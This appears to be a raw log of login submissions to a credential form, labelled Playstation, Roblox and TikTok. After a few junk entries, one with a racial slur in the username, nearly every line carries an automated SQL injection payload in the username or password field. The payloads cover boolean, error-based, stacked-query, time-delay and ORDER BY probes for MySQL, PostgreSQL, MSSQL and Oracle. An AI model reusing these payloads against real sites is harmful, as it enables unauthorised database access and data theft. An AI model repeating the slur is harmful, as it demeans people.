Playstation Username: allahboausdfhuhe Pass: edhfuehusahdf
Roblox Username: SigmaNNigga99 Pass: sdfasdfsdfsdf
Roblox Username: sadfnbjm,sznadfhnlkjashdefa Pass: aassdfasdfaasdfefsasdfaaws
Roblox Username: ;ssaledaidjufloaiesjrdawshfguioeswrhf Pass: ssfdfgkhashdfhhbwasedafuhnew
Tiktok Username: mvoc Pass: Nwwi
Tiktok Username: mvoc Pass: Nwwi
Tiktok Username: mvoc Pass: Nwwi
Tiktok Username: mvoc).("'...(( Pass: Nwwi
Tiktok Username: mvoc'QgnsJs<'">HqcZkF Pass: Nwwi
Tiktok Username: mvoc') AND 4250=1123 AND ('TVnL'='TVnL Pass: Nwwi
Tiktok Username: mvoc') AND 8362=8362 AND ('MtCO'='MtCO Pass: Nwwi
Tiktok Username: mvoc' AND 4422=9494 AND 'HvRw'='HvRw Pass: Nwwi
Tiktok Username: mvoc' AND 8362=8362 AND 'PPcT'='PPcT Pass: Nwwi
Tiktok Username: mvoc) AND 8730=6884 AND (8958=8958 Pass: Nwwi
Tiktok Username: mvoc) AND 8362=8362 AND (6175=6175 Pass: Nwwi
Tiktok Username: mvoc AND 8606=4285 Pass: Nwwi
Tiktok Username: mvoc AND 8362=8362 Pass: Nwwi
Tiktok Username: mvoc AND 6383=6976-- LzDx Pass: Nwwi
Tiktok Username: mvoc AND 8362=8362-- lPLS Pass: Nwwi
Tiktok Username: (SELECT (CASE WHEN (5291=3651) THEN 'mvoc' ELSE (SELECT 3651 UNION SELECT 7992) END)) Pass: Nwwi
Tiktok Username: (SELECT (CASE WHEN (1151=1151) THEN 'mvoc' ELSE (SELECT 7672 UNION SELECT 3235) END)) Pass: Nwwi
Tiktok Username: mvoc') AND EXTRACTVALUE(1467,CONCAT(0x5c,0x7170766a71,(SELECT (ELT(1467=1467,1))),0x716b6b7071)) AND ('nTHB'='nTHB Pass: Nwwi
Tiktok Username: mvoc' AND EXTRACTVALUE(1467,CONCAT(0x5c,0x7170766a71,(SELECT (ELT(1467=1467,1))),0x716b6b7071)) AND 'ViVd'='ViVd Pass: Nwwi
Tiktok Username: mvoc) AND EXTRACTVALUE(1467,CONCAT(0x5c,0x7170766a71,(SELECT (ELT(1467=1467,1))),0x716b6b7071)) AND (5560=5560 Pass: Nwwi
Tiktok Username: mvoc AND EXTRACTVALUE(1467,CONCAT(0x5c,0x7170766a71,(SELECT (ELT(1467=1467,1))),0x716b6b7071)) Pass: Nwwi
Tiktok Username: mvoc AND EXTRACTVALUE(1467,CONCAT(0x5c,0x7170766a71,(SELECT (ELT(1467=1467,1))),0x716b6b7071))-- mntn Pass: Nwwi
Tiktok Username: mvoc') AND 3464=CAST((CHR(113)||CHR(112)||CHR(118)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3464=3464) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113)) AS NUMERIC) AND ('UJgf'='UJgf Pass: Nwwi
Tiktok Username: mvoc' AND 3464=CAST((CHR(113)||CHR(112)||CHR(118)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3464=3464) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113)) AS NUMERIC) AND 'onoG'='onoG Pass: Nwwi
Tiktok Username: mvoc) AND 3464=CAST((CHR(113)||CHR(112)||CHR(118)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3464=3464) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113)) AS NUMERIC) AND (2722=2722 Pass: Nwwi
Tiktok Username: mvoc AND 3464=CAST((CHR(113)||CHR(112)||CHR(118)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3464=3464) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113)) AS NUMERIC) Pass: Nwwi
Tiktok Username: mvoc AND 3464=CAST((CHR(113)||CHR(112)||CHR(118)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3464=3464) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113)) AS NUMERIC)-- MUbm Pass: Nwwi
Tiktok Username: mvoc') AND 7807 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (7807=7807) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(112)+CHAR(113))) AND ('eOTb'='eOTb Pass: Nwwi
Tiktok Username: mvoc' AND 7807 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (7807=7807) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(112)+CHAR(113))) AND 'fOFw'='fOFw Pass: Nwwi
Tiktok Username: mvoc) AND 7807 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (7807=7807) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(112)+CHAR(113))) AND (8435=8435 Pass: Nwwi
Tiktok Username: mvoc AND 7807 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (7807=7807) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(112)+CHAR(113))) Pass: Nwwi
Tiktok Username: mvoc AND 7807 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (7807=7807) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(112)+CHAR(113)))-- ScmF Pass: Nwwi
Tiktok Username: mvoc') AND 3916=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(118)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (3916=3916) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL) AND ('LZcw'='LZcw Pass: Nwwi
Tiktok Username: mvoc' AND 3916=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(118)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (3916=3916) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL) AND 'PmhU'='PmhU Pass: Nwwi
Tiktok Username: mvoc) AND 3916=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(118)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (3916=3916) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL) AND (1673=1673 Pass: Nwwi
Tiktok Username: mvoc AND 3916=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(118)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (3916=3916) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL) Pass: Nwwi
Tiktok Username: mvoc AND 3916=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(118)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (3916=3916) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL)-- VgSV Pass: Nwwi
Tiktok Username: (SELECT CONCAT(CONCAT('qpvjq',(CASE WHEN (2528=2528) THEN '1' ELSE '0' END)),'qkkpq')) Pass: Nwwi
Tiktok Username: mvoc');SELECT PG_SLEEP(5)-- Pass: Nwwi
Tiktok Username: mvoc';SELECT PG_SLEEP(5)-- Pass: Nwwi
Tiktok Username: mvoc);SELECT PG_SLEEP(5)-- Pass: Nwwi
Tiktok Username: mvoc;SELECT PG_SLEEP(5)-- Pass: Nwwi
Tiktok Username: mvoc');WAITFOR DELAY '0:0:5'-- Pass: Nwwi
Tiktok Username: mvoc';WAITFOR DELAY '0:0:5'-- Pass: Nwwi
Tiktok Username: mvoc);WAITFOR DELAY '0:0:5'-- Pass: Nwwi
Tiktok Username: mvoc;WAITFOR DELAY '0:0:5'-- Pass: Nwwi
Tiktok Username: mvoc');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(86)||CHR(88)||CHR(106),5) FROM DUAL-- Pass: Nwwi
Tiktok Username: mvoc';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(86)||CHR(88)||CHR(106),5) FROM DUAL-- Pass: Nwwi
Tiktok Username: mvoc);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(86)||CHR(88)||CHR(106),5) FROM DUAL-- Pass: Nwwi
Tiktok Username: mvoc;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(86)||CHR(88)||CHR(106),5) FROM DUAL-- Pass: Nwwi
Tiktok Username: mvoc') AND (SELECT 6022 FROM (SELECT(SLEEP(5)))LHSS) AND ('XqgD'='XqgD Pass: Nwwi
Tiktok Username: mvoc' AND (SELECT 6022 FROM (SELECT(SLEEP(5)))LHSS) AND 'qRAo'='qRAo Pass: Nwwi
Tiktok Username: mvoc) AND (SELECT 6022 FROM (SELECT(SLEEP(5)))LHSS) AND (1500=1500 Pass: Nwwi
Tiktok Username: mvoc AND (SELECT 6022 FROM (SELECT(SLEEP(5)))LHSS) Pass: Nwwi
Tiktok Username: mvoc AND (SELECT 6022 FROM (SELECT(SLEEP(5)))LHSS)-- hlDv Pass: Nwwi
Tiktok Username: mvoc') AND 8842=(SELECT 8842 FROM PG_SLEEP(5)) AND ('bvUZ'='bvUZ Pass: Nwwi
Tiktok Username: mvoc' AND 8842=(SELECT 8842 FROM PG_SLEEP(5)) AND 'OErK'='OErK Pass: Nwwi
Tiktok Username: mvoc) AND 8842=(SELECT 8842 FROM PG_SLEEP(5)) AND (4728=4728 Pass: Nwwi
Tiktok Username: mvoc AND 8842=(SELECT 8842 FROM PG_SLEEP(5)) Pass: Nwwi
Tiktok Username: mvoc AND 8842=(SELECT 8842 FROM PG_SLEEP(5))-- CSfk Pass: Nwwi
Tiktok Username: mvoc') WAITFOR DELAY '0:0:5' AND ('SwfE'='SwfE Pass: Nwwi
Tiktok Username: mvoc' WAITFOR DELAY '0:0:5' AND 'QETc'='QETc Pass: Nwwi
Tiktok Username: mvoc) WAITFOR DELAY '0:0:5' AND (3954=3954 Pass: Nwwi
Tiktok Username: mvoc WAITFOR DELAY '0:0:5' Pass: Nwwi
Tiktok Username: mvoc WAITFOR DELAY '0:0:5'-- OybU Pass: Nwwi
Tiktok Username: mvoc') AND 2582=DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(104)||CHR(119)||CHR(79),5) AND ('uSpE'='uSpE Pass: Nwwi
Tiktok Username: mvoc' AND 2582=DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(104)||CHR(119)||CHR(79),5) AND 'fPgt'='fPgt Pass: Nwwi
Tiktok Username: mvoc) AND 2582=DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(104)||CHR(119)||CHR(79),5) AND (8204=8204 Pass: Nwwi
Tiktok Username: mvoc AND 2582=DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(104)||CHR(119)||CHR(79),5) Pass: Nwwi
Tiktok Username: mvoc AND 2582=DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(104)||CHR(119)||CHR(79),5)-- DEtY Pass: Nwwi
Tiktok Username: mvoc') ORDER BY 1-- vjMq Pass: Nwwi
Tiktok Username: mvoc' ORDER BY 1-- zpFU Pass: Nwwi
Tiktok Username: mvoc) ORDER BY 1-- hdhn Pass: Nwwi
Tiktok Username: mvoc ORDER BY 1-- Vzqi Pass: Nwwi
Tiktok Username: mvoc ORDER BY 1-- Qtox Pass: Nwwi
Tiktok Username: mvoc Pass: Nwwi()(",.,))'
Tiktok Username: mvoc Pass: Nwwi'ScMTnO<'">ViiMbo
Tiktok Username: mvoc Pass: Nwwi') AND 7289=7025 AND ('OLPb'='OLPb
Tiktok Username: mvoc Pass: Nwwi') AND 2534=2534 AND ('VGUH'='VGUH
Tiktok Username: mvoc Pass: Nwwi' AND 7812=4107 AND 'YUTw'='YUTw
Tiktok Username: mvoc Pass: Nwwi' AND 2534=2534 AND 'nQPq'='nQPq
Tiktok Username: mvoc Pass: Nwwi) AND 9684=3265 AND (3726=3726
Tiktok Username: mvoc Pass: Nwwi) AND 2534=2534 AND (3893=3893
Tiktok Username: mvoc Pass: Nwwi AND 7416=3045
Tiktok Username: mvoc Pass: Nwwi AND 2534=2534
Tiktok Username: mvoc Pass: Nwwi AND 9782=7215-- SOID
Tiktok Username: mvoc Pass: Nwwi AND 2534=2534-- VrnN
Tiktok Username: mvoc Pass: (SELECT (CASE WHEN (6997=4187) THEN 'Nwwi' ELSE (SELECT 4187 UNION SELECT 1194) END))
Tiktok Username: mvoc Pass: (SELECT (CASE WHEN (7208=7208) THEN 'Nwwi' ELSE (SELECT 6917 UNION SELECT 2834) END))
Tiktok Username: mvoc Pass: Nwwi') AND EXTRACTVALUE(4115,CONCAT(0x5c,0x7170766a71,(SELECT (ELT(4115=4115,1))),0x716b6b7071)) AND ('rUuj'='rUuj
Tiktok Username: mvoc Pass: Nwwi' AND EXTRACTVALUE(4115,CONCAT(0x5c,0x7170766a71,(SELECT (ELT(4115=4115,1))),0x716b6b7071)) AND 'hnDm'='hnDm
Tiktok Username: mvoc Pass: Nwwi) AND EXTRACTVALUE(4115,CONCAT(0x5c,0x7170766a71,(SELECT (ELT(4115=4115,1))),0x716b6b7071)) AND (5965=5965
Tiktok Username: mvoc Pass: Nwwi AND EXTRACTVALUE(4115,CONCAT(0x5c,0x7170766a71,(SELECT (ELT(4115=4115,1))),0x716b6b7071))
Tiktok Username: mvoc Pass: Nwwi AND EXTRACTVALUE(4115,CONCAT(0x5c,0x7170766a71,(SELECT (ELT(4115=4115,1))),0x716b6b7071))-- ppvJ
Tiktok Username: mvoc Pass: Nwwi') AND 5558=CAST((CHR(113)||CHR(112)||CHR(118)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (5558=5558) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113)) AS NUMERIC) AND ('rJop'='rJop
Tiktok Username: mvoc Pass: Nwwi' AND 5558=CAST((CHR(113)||CHR(112)||CHR(118)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (5558=5558) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113)) AS NUMERIC) AND 'eFeB'='eFeB
Tiktok Username: mvoc Pass: Nwwi) AND 5558=CAST((CHR(113)||CHR(112)||CHR(118)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (5558=5558) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113)) AS NUMERIC) AND (4655=4655
Tiktok Username: mvoc Pass: Nwwi AND 5558=CAST((CHR(113)||CHR(112)||CHR(118)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (5558=5558) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113)) AS NUMERIC)
Tiktok Username: mvoc Pass: Nwwi AND 5558=CAST((CHR(113)||CHR(112)||CHR(118)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (5558=5558) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113)) AS NUMERIC)-- hzQf
Tiktok Username: mvoc Pass: Nwwi') AND 7241 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (7241=7241) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(112)+CHAR(113))) AND ('EBkn'='EBkn
Tiktok Username: mvoc Pass: Nwwi' AND 7241 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (7241=7241) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(112)+CHAR(113))) AND 'XCBy'='XCBy
Tiktok Username: mvoc Pass: Nwwi) AND 7241 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (7241=7241) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(112)+CHAR(113))) AND (5072=5072
Tiktok Username: mvoc Pass: Nwwi AND 7241 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (7241=7241) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(112)+CHAR(113)))
Tiktok Username: mvoc Pass: Nwwi AND 7241 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (7241=7241) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(112)+CHAR(113)))-- zFEI
Tiktok Username: mvoc Pass: Nwwi') AND 1762=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(118)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (1762=1762) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL) AND ('krhw'='krhw
Tiktok Username: mvoc Pass: Nwwi' AND 1762=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(118)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (1762=1762) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL) AND 'nUnE'='nUnE
Tiktok Username: mvoc Pass: Nwwi) AND 1762=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(118)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (1762=1762) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL) AND (2329=2329
Tiktok Username: mvoc Pass: Nwwi AND 1762=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(118)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (1762=1762) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL)
Tiktok Username: mvoc Pass: Nwwi AND 1762=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(118)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (1762=1762) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL)-- pFCx
Tiktok Username: mvoc Pass: (SELECT CONCAT(CONCAT('qpvjq',(CASE WHEN (1633=1633) THEN '1' ELSE '0' END)),'qkkpq'))
Tiktok Username: mvoc Pass: Nwwi');SELECT PG_SLEEP(5)--
Tiktok Username: mvoc Pass: Nwwi';SELECT PG_SLEEP(5)--
Tiktok Username: mvoc Pass: Nwwi);SELECT PG_SLEEP(5)--
Tiktok Username: mvoc Pass: Nwwi;SELECT PG_SLEEP(5)--
Tiktok Username: mvoc Pass: Nwwi');WAITFOR DELAY '0:0:5'--
Tiktok Username: mvoc Pass: Nwwi';WAITFOR DELAY '0:0:5'--
Tiktok Username: mvoc Pass: Nwwi);WAITFOR DELAY '0:0:5'--
Tiktok Username: mvoc Pass: Nwwi;WAITFOR DELAY '0:0:5'--
Tiktok Username: mvoc Pass: Nwwi');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(103)||CHR(108)||CHR(65),5) FROM DUAL--
Tiktok Username: mvoc Pass: Nwwi';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(103)||CHR(108)||CHR(65),5) FROM DUAL--
Tiktok Username: mvoc Pass: Nwwi);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(103)||CHR(108)||CHR(65),5) FROM DUAL--
Tiktok Username: mvoc Pass: Nwwi;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(103)||CHR(108)||CHR(65),5) FROM DUAL--
Tiktok Username: mvoc Pass: Nwwi') AND (SELECT 8715 FROM (SELECT(SLEEP(5)))hZpp) AND ('uXsU'='uXsU
Tiktok Username: mvoc Pass: Nwwi' AND (SELECT 8715 FROM (SELECT(SLEEP(5)))hZpp) AND 'LmtN'='LmtN
Tiktok Username: mvoc Pass: Nwwi) AND (SELECT 8715 FROM (SELECT(SLEEP(5)))hZpp) AND (3807=3807
Tiktok Username: mvoc Pass: Nwwi AND (SELECT 8715 FROM (SELECT(SLEEP(5)))hZpp)
Tiktok Username: mvoc Pass: Nwwi AND (SELECT 8715 FROM (SELECT(SLEEP(5)))hZpp)-- oGMc
Tiktok Username: mvoc Pass: Nwwi') AND 4327=(SELECT 4327 FROM PG_SLEEP(5)) AND ('fmgZ'='fmgZ
Tiktok Username: mvoc Pass: Nwwi' AND 4327=(SELECT 4327 FROM PG_SLEEP(5)) AND 'ZAqD'='ZAqD
Tiktok Username: mvoc Pass: Nwwi) AND 4327=(SELECT 4327 FROM PG_SLEEP(5)) AND (6329=6329
Tiktok Username: mvoc Pass: Nwwi AND 4327=(SELECT 4327 FROM PG_SLEEP(5))
Tiktok Username: mvoc Pass: Nwwi AND 4327=(SELECT 4327 FROM PG_SLEEP(5))-- smjz
Tiktok Username: mvoc Pass: Nwwi') WAITFOR DELAY '0:0:5' AND ('RcUP'='RcUP
Tiktok Username: mvoc Pass: Nwwi' WAITFOR DELAY '0:0:5' AND 'ZSLJ'='ZSLJ
Tiktok Username: mvoc Pass: Nwwi) WAITFOR DELAY '0:0:5' AND (6184=6184
Tiktok Username: mvoc Pass: Nwwi WAITFOR DELAY '0:0:5'
Tiktok Username: mvoc Pass: Nwwi WAITFOR DELAY '0:0:5'-- SrLt
Tiktok Username: mvoc Pass: Nwwi') AND 3605=DBMS_PIPE.RECEIVE_MESSAGE(CHR(67)||CHR(120)||CHR(108)||CHR(107),5) AND ('hDtP'='hDtP
Tiktok Username: mvoc Pass: Nwwi' AND 3605=DBMS_PIPE.RECEIVE_MESSAGE(CHR(67)||CHR(120)||CHR(108)||CHR(107),5) AND 'xvNJ'='xvNJ
Tiktok Username: mvoc Pass: Nwwi) AND 3605=DBMS_PIPE.RECEIVE_MESSAGE(CHR(67)||CHR(120)||CHR(108)||CHR(107),5) AND (6217=6217
Tiktok Username: mvoc Pass: Nwwi AND 3605=DBMS_PIPE.RECEIVE_MESSAGE(CHR(67)||CHR(120)||CHR(108)||CHR(107),5)
Tiktok Username: mvoc Pass: Nwwi AND 3605=DBMS_PIPE.RECEIVE_MESSAGE(CHR(67)||CHR(120)||CHR(108)||CHR(107),5)-- yhWi
Tiktok Username: mvoc Pass: Nwwi') ORDER BY 1-- aEQv
Tiktok Username: mvoc Pass: Nwwi' ORDER BY 1-- MDny
Tiktok Username: mvoc Pass: Nwwi) ORDER BY 1-- eLjX
Tiktok Username: mvoc Pass: Nwwi ORDER BY 1-- AQIK
Tiktok Username: mvoc Pass: Nwwi ORDER BY 1-- jSgG
